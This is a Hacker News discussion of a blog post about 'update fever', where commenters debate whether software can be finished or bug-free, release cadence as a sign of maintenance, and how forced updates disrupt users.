Hacker News new | comments | show | ask | jobs | submit login
Why the Update Fever Is Bad (irrlicht3d.org)
149 points by irrlichthn 11 months ago | hide | past | web | favorite | 110 comments



Software updates are a kind of project heartbeat. The content of them is less important than the signal, "this project is still alive, and maintainers are fixing issues for people". If a project does not put out updates, then users may (understandably) worry that if they have an issue, it won't get addressed promptly.

I actually don't think there is anything wrong with having time-based releases, and putting very little content in some of them. If you only fix one bug in a quarterly/bi-annual release and tweak some docs, because that's all that's needed, you have still fixed an issue for somebody, and demonstrated to all of your other users that you are still keeping your commitments, and there for them if they need you.


But on the other hand, if the software is stable and no longer needs updating why force small inconsequential changes just to appear to be maintained?

Just release when there's something to release.


There is no software without bugs.

People seem to know that. Developers sometimes do not.


There are projects that are close to bugfree, though. You can use a 3 year old version of sqlite without any difficulty. I don't know what version of "ls" or "mkdir" my machine runs, but I never worry about these simple utilities being out of date or behaving differently in release/staging. These utilities are essentially done, and 30 years from now they'll still work fine.

There is no software without bugs in the same sense that there exists no hardware that cannot fail. But you can create software that is so close to perfect that hardware failures outnumber software failures 100:1, so there is no point in pursuing perfection any further.


SQLite is not typical software. It has over 90 million lines of test code, and is run in production every day by pretty much every computer in the world.

mkdir(1) is also not typical. Excluding the copyright header comment, it's so short that it fits entirely on one screen. If I ran into a bug, I could probably find it and fix it (or write my own version) in about 3 minutes.

It is indeed possible to "create software that is so close to perfect that hardware failures outnumber software failures 100:1", but it's so time-consuming that almost nobody ever does it.

Version 1.0.1 of a free mind-mapping app may be good and useful software, but I can virtually guarantee it has bugs. I doubt even the author would claim it's only at 1.0.1 because "there is no point in pursuing perfection any further".


I agree that sqlite's quality is unusually high. That's why I used it as an example of what kind of quality is achievable.

However, I think you're approaching this from the wrong way. The most important thing about sqlite isn't the amount of manhours put into it, but the millions upon millions of manhours that have been saved because the product works so unbelievably well.

sqlite is the exception, and this is because the people involved in it really care about quality. Our software engineering culture has a lot to learn from the success of sqlite.


> mkdir(1) [...] it's so short that it fits entirely on one screen.

296 lines in the main .c file, without counting the headers and helper functions: https://git.savannah.gnu.org/cgit/coreutils.git/tree/src/mkd...


And, entertainingly, it contains a FIXME! https://git.savannah.gnu.org/cgit/coreutils.git/tree/src/mkd...


http://www.cvedetails.com/vendor/9237/Sqlite.html

Really? A running 3 years out-of-date sqlite install?

Methinks some hackers smell chum in the water. XSS, remote code execution, priviledge escalation, directory traversal... and for most of these, we even have choices on how to attack! Plenty of overflow attacks involved here. Where are the idiot script kiddies when you need them to demo how this ignorance hurts?

And once in to your sql database, I wonder where else we can pivot...

Remember how shellshock shook the world, because the software bedrock was actually insecure? Yeah... your old, "stable" stuff has had holes the entire time.

Stay current. If your OS makes that a challenge, ditch it for a better one.


mkdir? I'm trying to imagine somebody deciding to no longer use directories because mkdir looks like it's been abandoned.


> are close to bugfree

Or bugfree for the use cases of it's users (how many or few there may be).


I've had enough of small utilities that didn't work as expected. Also ls or mkdir can for example be part of busybox ported to a Blackfin. No guarantees that there are no bugs in these by far!

Edit: here you have the source code for the "small" ls utility: http://git.savannah.gnu.org/cgit/coreutils.git/tree/src/ls.c. Yes, over 5000 lines.


Your claim was that "there is no software without bugs". I'm pointing out that this is true only in the narrow philosophical sense. You cannot draw a perfect circle, either. But you can draw a circle that gets pretty damn close.

Software cannot be perfect but this doesn't mean that software needs to be shoddy. sqlite is a complex product and it has orders of magnitude fewer bugs than other projects of similar complexity.

It is factually, observably, possible to create software that is very close to perfect, it just takes a lot of hard work. Software has a reputation for being buggy not because it's impossible to write flawless software, but because most software is really poorly written.


The feature bloat is typical for gnu coreutils; for reference ls.c for OpenBSD, NetBSD and FreeBSD is 614, 716, 933 lines respectively [1][2][3]

[1] https://github.com/Bluerise/OpenBSD-src/blob/master/bin/ls/l... [2] cvsweb.netbsd.org/bsdweb.cgi/~checkout~/src/bin/ls/ls.c?rev=1.75.4.1 [3] https://github.com/freebsd/freebsd/blob/master/bin/ls/ls.c


While this is true, I think all that matters is promptness.

If someone opens an issue, will it get addressed quickly? That's what users care about.


Maybe the developer is developing something else and will come back to the first project in time.


and from the article itself: "[...] and is pretty stable and bug-free by now."


Because being maintained is very important for users and one of the easiest and most convincing ways to show that is to release updates.

But then we have the other side, releasing update after update without fixing or responding to common issues. That is quite damaging as well.


> Because being maintained is very important for users and one of the easiest and most convincing ways to show that is to release updates.

It's so true that you never ever see people using decade old versions of software, right?

Users care that their shit works, that's it.


> Users care that their shit works, that's it.

Exactly, so when that forced OS update broke the software it is kind of nice to know that someone is still around to fix it.


Never mind when an update is effectively a rewrite that strips out features/behaviors someone, somewhere, relied upon.

This duality of updates is why people avoid updating.


Maybe for 'trivial' software that can be the case. However for anything complex even if there isn't a problem inherent in the software there are still interactions with the environment which could cause a need for some workaround.


> Just release when there's something to release.

This emphatically does not work very well for big projects. The problem is human pyschology and the unreliability of all effort estimation processes (in software development). Once people get used to the idea that "well, we'll just postpone the release a little bit" then it eventually becomes a routine thing and for popular projects there's always someone who has a good reason that their particular feature should make it in before the release. (Because who knows when the next release will be?)

The Linux kernel and the C++ ISO standards committee have got this EXACTLY right (since C++11). Predictable releases means:

a) you don't need to rush anything particularly because you know there'll be a new release in N months.

b) any incidental small (not-worthy-of-a-release) bugs get fixed in the interim.

c) downstreams can plan based on when your next release is going to happen.

Predictability is a huge deal and IMO it's incredibly underappreciated just how much it matters. Even if it meant a 10% or 20% 'efficiency' loss (on some metric) I would personally still consider it a win.

For an example of not doing it this way, look at C++ pre-2011 and perhaps also ECMAScript pre-2015. (This is also rampant is development, though no public examples come to mind right now. I'm sure some other commenter can supply some. It's so bad that it can in fact kill projects.)

EDIT: I forgot to mention: Regular updates also means that the "consumer" must get into the practice of regularly applying updates... and will thus become forced to get better at doing that. Ideally to the point of having completely automated updates.


Some people just want to stay home and watch movies and live a tranquil life while others don't feel good if they aren't permanently moving and discovering the world.


Some people want to move and discover the world but can't because their computer is constantly bleating for attention toward make-work 'updates' that really do nothing but bump the version number to reassure the insecure sorts that stay home all the time.


Software is very rarely perfect though. There are some rare cases like Winamp and Photoshop where there's just not much to add.

I do find projects like Dwarf Fortress very charming in that there's an endless supply of new things to look forward to.


Photoshop has a new release every year or so, usually with new features.


The term "Creeping Featuritis" probably applies to that specific example. And any MS Office release in the last decade or so. :)


Nah, with Photoshop most of the new features are pretty useful. As abysmal as Adobe is with some stuff, they seem to get Photoshop right all the time.


DF is also unlikely to be critical to someones workflow or similar.


Here is an example: old wi-fi router firmware that you can't get updates for is vulnerable to problems discovered in the original algorithms, which are correctly implemented in that firmware.

Software can only be as correct and complete as its specification. If that is a moving target, oops!


Literally every time I've let my phone update the Android version, something changed to my detriment - missing feature, not being able to do something a certain way anymore, etc. with the only benefit being the ability to run apps that only target the new version. App updates are often no better.


I think this is part of the mindset the OP is criticizing.

Following that logic, a software cannot possibly be completed - It can be either in development or dead. Which would mean you either have a budget of time, money and resources for constant maintenance of your software - or you might not write that software at all. Repeat that for every new piece of software you want to write.

The problem is that this is impossible to do for hobbyist authors, so we would lose a large amount of free or open-source software currently available.


Did you realize that Torvalds did not have anything to do with Linux 2.6.32.70?

He offloaded the whole project onto another team (who mostly backported fixes) that kept it going until early 2016. The rest of us were already in Linux 4.X territory by then.

If you cant maintain it, you can pay someone.

Or, thanks to Github, lets talk about letting the code-literate userbase sort it out themselves. Assuming they care enough.

Or, we could pivot this discussion to the "evils of Capitalism" and whatnot since that userbase probably needs to eat.


This assumes there is a team or a "code-literate userbase" and you trust them enough not to do bad things with your software (e.g. add adverts, tracking, backdoors or miners)

> Or, we could pivot this discussion to the "evils of Capitalism" and whatnot since that userbase probably needs to eat.

Or we could try to back and accept that software could also simply be a tool and doesn't have to be an enterprise.


There's kind of a parallel with signals regarding businesses as well. There may be nothing wrong with a store that hasn't been renovated since the 90s, but it gives off a "run-down" vibe like it wouldn't be there much longer.


Difference is that buildings etc need to be maintained or else they break down. Sofware, baring weirdness like "bitrot" from unreliable storage hardware, do not break down.


CVEs, etc accumulate with enough attention. Whether they're published depends on whether your team courts or snubs the security side of the industry.

I wonder how many coders out there don't know about the dangers of global variables in production software, sans obifuscation. Or that can't articlate why an unbounded array is evil, even if the compiler lets you do that.

Seriously... free love was a nice party. But then when public knowledge of STDs arose, the party died down. Today, condom use is on the rise.

Similarly, our free Hobbyist Software love has had a good run. If it dies back, we'll lose a generation of up-and-coming coders. So I guess the message here is jails/containers? Wear your software condoms, kiddies.


Glad to see this being written.

"Trained" is the word I have thought of many times as well. It is perplexing to see people wanting updates.

It is possible to write finished programs that are bug-free[FN1]. But when eternal rounds of patching becomes a religion, what sort of standard are developers promoting? Every program is expected to have security holes that will need to be patched? What about not releasing software unless it is safe to begin with? Why does a liability need to be created? Solve the problems before the software is released. Not after. Can't solve them? Then do not release.

Automatic updates are also a security hazard in the same way as "antivirus", which also trained users to want updates. It is a backdoor that users are advised to leave open.

FN1. Inevitably there will be the HN commenter who repeats some meme that says all software has bugs. True perhaps if we forget about Ada and the world outside of MS Windows, but are all the bugs major ones? Consider the stuff you find at http://cr.yp.to. Or many of the small UNIX utilities. I could name more selected examples. There is such a thing as finished software. With no major bugs. That does not need constant updates.


Whether or not software can be finished with 0 bugs is sort of irrelevant. Windows and other software users use most will basically never be "finished".

The updates that are causing the fever are not just "bugfixes", they are the current state of living software--always expanding and improving (at least in intent). The fact users see software that hasn't been updated as dead is a reflection of their learned expectations. And they are correct, it likely is dead in the "no longer improving as my other software is" sense.

The real issue I have is how shitty most update processes are. Thanks for rebooting my PC Win 10, yes Sublime Text, please tell me again in a dialog that there is an update, etc. Some apps have done much better here like Chrome and Discord, but it is not an easy thing to build.


The question - and what the article is arguing is about - is if the "no longer improving as my other software is" part makes sense. Does software always have to change (not necessarily improve as software will become worse almost as often as it'll become better - especially when it comes to GUI programs that often tend to shuffle things around, invalidating the users' knowledge)?


I think people tend to memorize how they use software so randomizing / frequently changing your UI is superbly bad, in that I agreeing with your point and that part of the article.

The trouble I still see is that most software is barely held together built on top of stuff that is even worse. From my experience, if it is running on Android or Windows, it is 100% guaranteed you will have an issue you didn't predict because some set of users have done something crazy to their device. I guess you could always leave these things broken for a while, but it would reflect poorly and is hard to convince others that "oh this crash is ok".

I guess tl;dr I think most software is broken and always broken and updating more or less frequently wouldn't really change the brokenness for users, but the frequent updates at least give them hope fixes are coming and their feedback matters. Knowing you'll have this bug forever makes any alternative attractive.


> There is such a thing as finished software. With no major bugs. That does not need constant updates.

The general attitude (both on HN and elsewhere) is that if any security update exists for a product you use then you are a complete moron not to update it immediately. There is virtually no acknowledgment of any nuance on the topic in my experience.


I think this is what people officially say, because this is the "right" thing to do, and in general it makes sense. But in real life things are different. I had to support many ancient systems with no security updates for years or even decades now. For some of them some updates were available, but we didn't even have the hardware to test them on. Yes, we were gradually moving many older parts to newer systems. Nevertheless, in the case of these older machines working in isolated networks, trying to patch them was just asking for trouble. I bet many admins on HN have similar experience.


In other words, people are "virtue signaling"...


Not applying a security update is willingly leaving a known security hole in place. At best, you are making your system insecure, and at worst, you are putting others on your network and/or in your social circles at risk.


or.... You are trying to avoid an update that is going to break your machine/workflow. If security updates were sent along a different channel than feature updates, this wouldn't be an issue. But companies keep tying these together, and there are only so many features you can carelessly break before users become aware of what you are really doing.


If you are not happy with the direction a certain piece of software is heading in, you are free to switch to a competitor that fits your workflow better.

This mentality is what led to Windows XP sticking around long after being declared dead.


If you are lucky to have a competitor. This type of thinking is so naive, I can't believe we still see it pop up every now and then.


I'd like you to expound upon that lack of competition. Where does it pop up?


Android vs iPhone, any website that is moving into a "modern" framework direction. Software that runs MRI's, or CT's. Also any software that is picked by middle management, rather than the people that actually use the software: ADP, Oracle, anything in the education realm, etc.


All software has bugs.

There is no such thing as finished software.

The size of a bug is in the eye of the beholder.

Sorry for the Shellshock.

Edit, took me two seconds to find: https://news.ycombinator.com/item?id=502651. Just as response to http://cr.yp.to/djbdns/guarantee.html


You may be missing the point if the post. Good software asymptotically aproaches bug free over time. Meaning it should require fewer and fewer updates less and less frequently. But reduced frequency of updates is percieved as death of software, and this is actually a problem. I even see it in developers who use it as a metric when choosing frameworks and libraries which is a mistake for older software.

I saw a study done on github where the author wanted to know what languages had the smallest open bug count, and found unexpectedly that c and c++, which are notoriously bug inducing languages, had some of the lowest bug rates of all the languages. His conclusion was that the low bug count was actually due to the languages being used for foudational work, libraries and drivers and such, basically reaffirming the 'many eyes make shallow bugs' adage.

The better metric for if software is no longer being maintained is how responsive is the maintainer to their mailing list/support channel. Regularly seeing requests going unanswered is also likely to show that any updates that happen are also likely ignoring actual user needs.


"Many eyes make all bugs shallow" has been considered an eye-rolling phrase for years now. The reason that foundational C/C++ libs have few open bugs on Github is because they all predate Github and have their own bug trackers, and Github's issue tracker is so anemic (or, more charitably, optimized for small projects) that it offers little incentive for switching.


Addendum: I also believe it is possible to write software that does not need to be "improved". I prefer reliable software more than "dynamic" software that is a constant state of flux. And as you might guess I am not fond of software that keeps expanding with "features" to fill available space. I am quite happy if software just keeps doing what I expect it do, without slowing down or failing. The question I would have as to other users who appear to want updates is whether they want new features or whether they are hoping the next update fixes some specific or general annoyance they are experiencing, e.g., perhaps generally they are not thrilled with the software and hope the "new" or "updated" version will be less disappointing.

While some may think I have misinterpreted the blog author (and I acknowledge this is a valid response), I still think that bug or nondescript "security fixes" is a powerful, fear-based mechanism to compel users to allow updates -- of any kind. And it therefore relevant to any discussion of "updates". Especially when it is common for these bug or "security fixes" to be inextricably mixed with non-security items such as "features" in such a way that the user must except the "whole hog", perhaps in some way similar to "omnibus legislation" in the US Congress.

I respect everyone's opinions whether you agree with me or not. I am just happy to see that some users may be thinking about "updates" and what they really are instead of blindly accepting them without ever pausing to think.

From my perspective every new "feature" that adds code is also introducing a new potential for a bug or security issue. I want programs and systems to get smaller not larger.


A Linux util is more like a program function than a piece of software. The fact that it’s compiled as a separate executable isn’t really relevant as it’s typically deployed as part of something bigger such as a Linux distribution - which is a piece of software that is certainly is complex enough to have bugs forever. “Bug free” software might exist but it’s rare.

The most important thing is that I need to be reassured that if a major bug is discovered in the software I’m using, then it will be fixed. How can I be sure of that? The absolutely simplest way is if the software releases regular updates with very small changes. It’s a heartbeat to let people know there is someone that will solve the future problem.

I don’t even need to install these updates! They are mostly symbolic, that doesn’t make them irrelevant.


Even small UNIX utilities had had many bugs. See numerous man pages with bugs section.


People expect their software to improve over time, and thus receive updates, and this is perfectly reasonable. Most software is never "done". If it is a small module written in a highly mature language and operating in a stable, slow moving ecosystem, then fine. In those cases, simply document that updates will be few and far between and that this is expected for the above reasons.

More likely, development simply slows down because the maintainer got lazy, moved on to other interests, or doesn't have time for other reasons. Users don't like this and they are right to worry that the maintainer may be unresponsive or that the software will not be quickly patched in the event of a security vulnerability being discovered because the software is not actively maintained.

Your software is not complete. It is merely functional. In fact, it may not even be functional, as the rest of the world moves on without you and your code rots away.


Counterpoint: I've written a lot of niche utilities over the years. Some of them are very simple, and some of them are very complex. They're specialized enough that in most cases, they are the only software that performs a specific type of work.

To my knowledge, they all still do exactly what I made them to do. Are there things I would like to add to some of them if I had unlimited time? Yes. Does not having time to do that mean that they've stopped doing what they were designed to do? No.

The only time I can see an argument for frequent updates being required (as opposed to a bonus) is for software with direct dependencies on other things. youtube-dl, for example, or the NTDS.dit-extracting functionality in Impacket are good examples of this - they work directly with content that may change at any time, so someone needs to make sure they're compatible with the current versions of that content.


I stopped letting my iPhone update. I swear every update makes it slower and buggier. My old iPad which was perfectly fast and great at the time is now almost unusable after 4 iOS upgrades. It won't even play Sudoko without constant mini freezes.


People would rather use a functional but insecure tool than a broken secure one. No question. It's hard for devs to understand that for some reason.


My iOS device is noticeably laggier too, and I find it difficult to point the finger at security fixes. More likely the bloat from a load of features that nobody asked for.


Because devs live and breath security. End result is that they develop blinders to anything else.

Also they know when and why to update stuff they work on, thus i never happens at an inopportune time. Nor do they find themselves having to wrangle the new dependency kudzu they created, because for them it built up over time.


I don't think it's the added security, that makes new software slower and less responsive.


[flagged]


Please don't be personally rude to user users here.

https://news.ycombinator.com/newsguidelines.html


I guess if your software is stable and 'finished' enough not to be updated often then it would be good if you have an established communication channel (like a website or a GitHub page) that will periodically come out with, well, 'news updates', since it is true that most users are conditioned to expect some kind of update/activity surrounding their software.

Besides any moderately complex software will probably have enough bugs to require updates now & then for years, even if no new features or added. Not only bugs but often the underlying platform changes/breaks, needing workarounds or rebuilds.


This is something I see with Common Lisp libraries a lot. Many of them look abandoned, because they've had no updates in years. But they're really not: they each aimed to do one thing, they each do it well, and they don't have any more (notable) bugs. The Lisp spec doesn't change, so if a library's functional spec doesn't change … it's complete.

E.g. https://github.com/dardoria/uuid a library to generate UUIDs: once it fulfills the spec properly, it's essentially done. This particular example could contain a bug, of course, but the principle stands.


It does not even have a readme. What kind of definition of done is this?


I gave up on Windows about 10 years ago. I've had to use it for work sometimes, but the Windows Updates are actually destructive sometimes, and often take hours to install during business hours (especially if you happen to need to reboot before an important meeting...). I can't handle uncertainty in Software, and I think that many business are losing productivity because of this. Or maybe IT support departments are happy to keep themselves employed.


Sadly the Linux ecosystem (baring the kernel and the GNU supplied coreutils) do not seem to do any better. And from what gather, Apple is notorious for breaking things as they see fit as well. Not sure how well the BSDs do in this regard.


I am a Debian sid user, so I know well what you mean, but as long as you don't do a kernel upgrade, Linux has been extremely stable for me. This wasn't always the case. 10 years ago, Debian sid would break all the time, but I have probably had only one or two non-kernel/driver related issues in the past 5 years.

Another subtle difference is that on Linux platforms, you have more control over when/how to update, as well as visibility into exactly what is updating. I'm sure it's visible on other platforms, but I don't have to worry about rebooting my machine and having to wait 2 hours for it to come up.

Perhaps another point worth mentioning, LTS versions of Linux distros (Debian stable, or Ubuntu LTS versions) mainly get security patches, and, optionally, back ported software. That makes your OS stack super stable!

I'd put kernel upgrades into a different bucket... but most users don't need to update their kernel on a daily or even yearly basis except for security patches.

Great point about coreutils too! No need to update ls and grep...


This doesn't say much about why it's bad. Colin Percival wrote a more detailed piece on updates, their problems and considerations here: http://www.daemonology.net/blog/2017-06-14-oil-changes-safet... and suggests separate channels for 'updates' vs. 'security fixes'.

This is something new for Microsoft: Usually they won't break their own old software with updates, they are known for keeping up backwards compatibility at all costs.

It really isn't. Thirteen years ago: https://www.joelonsoftware.com/2004/06/13/how-microsoft-lost...

If you ask the users about it, they don't even know why they want these updates. Is there a feature they are missing?

New things are fun. Maybe there'll be a feature I don't know I'm missing until I see it. I'm hankering for you to amaze me and fix all my problems. Be my Holy Grail of (text editing, browsing, productivity, databasing, developing, life ...).


New things are fun when you are young. As you grow older you learn to appreciate stable reliable behavior.


With such a huge spectrum of kind of software, what applies in one kind won't necessarily be so for another.

The heartbeat argument is an obvious case. It's the same reason people look at the UI "chrome" in the screenshots in Android Play Store - if the battery indicator is from Eclair it doesn't built confidence it'll work in Nougat!

But that may apply less to a more minimalist utility (eg a command line tool)

Merely to update it so that you formally confirm that this version was tested on newer systems may be valid in some cases (although one could merely update documentation in many cases for that).

And then there is the dependency argument. Where a tool directly contains underlying packages, it builds confidence the developer won't get stuck too far behind current(ish) versions (with the greater risk of it becoming abandonware). Where the dependencies are external (ie up to the user to have installed) you do not want to be stuck on some old version, as other tools may move on, even if this super-stable software doesn't feel the need.


I agree with this to a certain extent. If more care had been put into the software to start with then they should need frequent updating. And often bugs can be introduced with an update of a dependency for example, because you cannot be sure that all your dependencies are preserving backwards compatibility. Usually it goes something like this, inconsequential dependency has a security vulnerability that needs updated, that requires two other dependencies to be updated, the third one is pretty hacky and has a latent bug. Software is updated, but over the next month three more hotfixes are needed to address the bugs by the bad dependency. Thus the software lifecycle continues on. Btw, I thought this article related to this was really interesting: https://www.siliconrepublic.com/innovation/darpa-working-on-...


Show them somehow it is still supported, update the minor version or something.

In general:

If I come across a 3 year old binary, and no news article about dev activity it looks "dead and unsupported". Also on GitHub, if there is no commit for 1+ year, it looks "dead and unsupported", piling up of Github issues is also a bad sign. Using "dead" binary asks for troubles down roads, when you want to use it in a few months and it stopped working.


Binaries (without external runtime dependencies) generally don't just "stop working" like that unless you change something significant about your system.


Ideally yes, but the world changed. There are a constant stream of updates for your OS, graphic card driver, etc which constantly break things left and right. If it affects a big software, even an outdated version) the user outcry will make sure it get fixed. But you better make sure not to rely on an unsupported 3 year old rather niche software if you plan to upgrade anytime soon.


If a software is under active development, one would at least occasionally expect updates with new features and enhancements. Even if it is just in maintenance mode, there would be bug and security fixes. Not every week, but at least every couple of months. With software like iOS apps, it is a huge warning sign, if apps are not updated after OS updates or especially after new devices introduce new screen sizes. And with iOS, those apps are eventually going to stop working.


It's not like we always have the choice not to upgrade, either because of security (IoT anyone?), because one of the giant's shoulder a software has been built on has gone wild or has its own security fix to deploy (https://github.com/blog/2470-introducing-security-alerts-on-...), or just because updates are automatically installed and it's too late when you realize it's broken :-/

Edit: Android devices does not suffer from this fever, btw. How good. Really. https://danluu.com/android-updates/


>>> Is there a feature they are missing? A specific bug they want to have fixed? They don't know. They only want updates, because they are used to it.

A long, long time ago DJGPP 2.0 was released, and almost immediately people were asking when version 3.0 was coming out.

It was a DOS port of the GNU C compiler, so really you can't make a new version of it until the next GCC comes out. Plus, the question was, "What would the update have?"

It's not like commercial software where you need to add features every quarter so your competition doesn't leave you in the dust.


> So for non-security critical software, it is sometimes better not to update that often. This update fever is bad both for developers and users.

What software is non-security critical anymore?


An appropriately sandboxed process that has no access to other processes or files can be considered non-security critical. But sadly nearly all programs commonly in use can access all the user's data and do with them as it wishes (hence ransomware) thus we have to perforce consider every program as security critical.


> What software is non-security critical anymore?

LaTeX, MATLAB, CMake...


Terrible examples, considering that these are programming languages that people will use to run code from random sources.

"git clone foo && cmake foo" can definitely be a security problem, and not just because the code itself is untrusted.


It's not cmake's job to limit the behaviour of programs written with it.


OTOH, allocating & using memory correctly so that a maliciously-crafted Makefile can't get elevated permissions is.


A makefile can call whatever it wants so if you run a malicious one you're already hacked. There's nothing you can do with a cmake buffer overrun that you can't also do just by writing a normal cmake file to call out whichever malicious commands you want.


>> It's not cmake's job to limit the behaviour of programs written with it.

> OTOH, allocating & using memory correctly so that a maliciously-crafted Makefile can't get elevated permissions is.

https://en.wikipedia.org/wiki/Not_even_wrong


You are technically not wrong, of course, but if the attack vector got already to running Makefiles on your system, you should probably focus your effort to tighten security elsewhere.


A lot of commenters have keyed into the product heartbeat line. Shipping updates is one common signals of a healthy product but it’s not the only one. If your product has non-user-facing changes, you should try to make noise about what other people are actively building or doing with your product. Or if you’re offering a service, market reliability and put time into showing stability and educating customers on why they should trust that they can build with you. You should also be working on acquiring customers if your product is in that phase. Realistically you’re talking about a product that requires little to no maintenance for existing customers which should free you up to spend time getting more customers.

Any of the above is going to realistically create feature work as you work with new customers or users and find further areas for completing your product offering.

Word of caution — this work will never realistically end, or you will end. There is no end state to software. Software is the tool, the product is your user or customer community and the problems you solve together. If you’re looking to build software as an end state, I see obvious problems, and your customers do too.


BTW Irrlicht is great so thank you to the author for making it. CobberCube looks good too. But that is one reason someone might not update a project a lot -- they are making other stuff, for example one along the same lines that could make money. But Irrlicht works great still and still has a forum etc. so I would not complain if there weren't more updates.

Actually I wouldn't really want another update at this point, because I already have a code base built on the existing thing that does what I want and adapting to new/changed stuff would distract from developing features specific to my system.


I don't know if it's just me, but I have to exert significant energy to convince (typically) new hires, that it does not really hurt anything if we use older versions of some dependencies, as long as they are stable and we are not hitting any bugs or vulnerabilities. In other words: it is not reason enough and not worth to update only because a new version was just released.

Such discussions usually end in one final argument from the new developer: "But your version is no longer maintained!"


Interesting debate, updates as a product viability signal.

I can see the angle as a developer that there isn't anything new this week/month/quarter in the software. And I can see the user angle that if it hasn't been updated perhaps updates are no longer available.

That makes me wonder if an update that says the software continues to be in good shape (a non-update update) would assuage the user. Something like that could be automated and so not impact the developer.


> Is there a feature they are missing? A specific bug they want to have fixed? They don't know. They only want updates, because they are used to it.

That doesn't sound like the most charitable reading. A lot of customers expect updates to mean performance improvements or security fixes, neither of which they'd be able to ask for with any kind of specifics.


Tail wagging the dog.

If it needs a fix, update it.

If you want to increase awareness, add a feature.

If people are paying a software support fee or have a contract stating a certain number of releases a year then do releases.

Otherwise why risk introducing new problems


I wouldn't call myself very experienced, but software is really brittle and everything is built on top of something else, so an update triggers an update triggers an update..


But there are other ways to build software. You can make apps with very few dependencies, use stable APIs only, program defensively, make sure you properly read the docs and handle all error conditions, don’t add unnecessary features, etc.

The result can be an app that requires minimal maintenance and it might work for years without any changes at all.


But doing so takes focus and diligence, something the software world is notoriously short on (likely they can always push another fix to prod, unlike with hardware).


And it wasn't always like that with software. We're used to the current situation in the age of portable devices and app stores, but I remember buying software in the 80s and 90s when most people didn't have a modem or any networking connectivity on their home machines. You went to a store, and bought software on disk or CD that came in a cardboard box shrinkwrapped in cellophane. You tried out the features, and it either worked or it didn't. And if it didn't, you were stuck - but that generally didn't happen, to my memory. Because of the lack of options when the product was on the shelves, it was tested rigorously. (Of course it would be fair to say that it would be a siloed runnable that wouldn't generally have dependencies or be required to interoperate with anything else, but the feature density would be comparable).

There was none of this "fix it in tomorrow's release" from the "just ship it duuuudes", so you didn't find obvious defects in features within minutes.


Do fake update at semi-random time. Visualize it, eg. show them a dialog with progress bar and percentage.


Thus wasting other people's time and productivity?

I'm using the Atom editor. It's kind of annoying how it pushes new updates every week. Previously used Subline Text 2 which just worked and did not have an update for years.


Sublime is a great example of users getting update fever. The forum is riddled with long ”is this software dead?” threads that pop up at regular intervals.


Eventually it will be, if they stop updating it. Atom and visual studio code are overtaking it.


Excellent, well put!


maybe nullupdates should be a thing.


For anyone thinking about doing this, here are some free release note templates:

"Bug fixes and stability improvements"

"Thank you for using <X>! For your benefit, we update <X> continuously. Every updates for <X> potentially includes new features, bug fixes and other improvements. Don't hesitate to reach out to noreply@<X>app.com if you have any questions or suggestions."

"Bedankt dat je <X> gebruikt! Bij het invullen van de releasenotes heeft onze stagiair niet opgelet en per ongeluk de verkeerde taal geplakt. Geen probleem. We hopen dat je van deze nieuwe versie geniet!"

(For the longest time, the Dutch Facebook Messenger app had release notes in some Scandinavian language.)


A lot of popular iOS apps are doing this, which I personally find extremely annoying.


I would reckon that the average user doesn't care for a list of specific bug fixes.


So many big apps (including some from Google themselves) have such a line permanently bolted to them over at Android as well.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: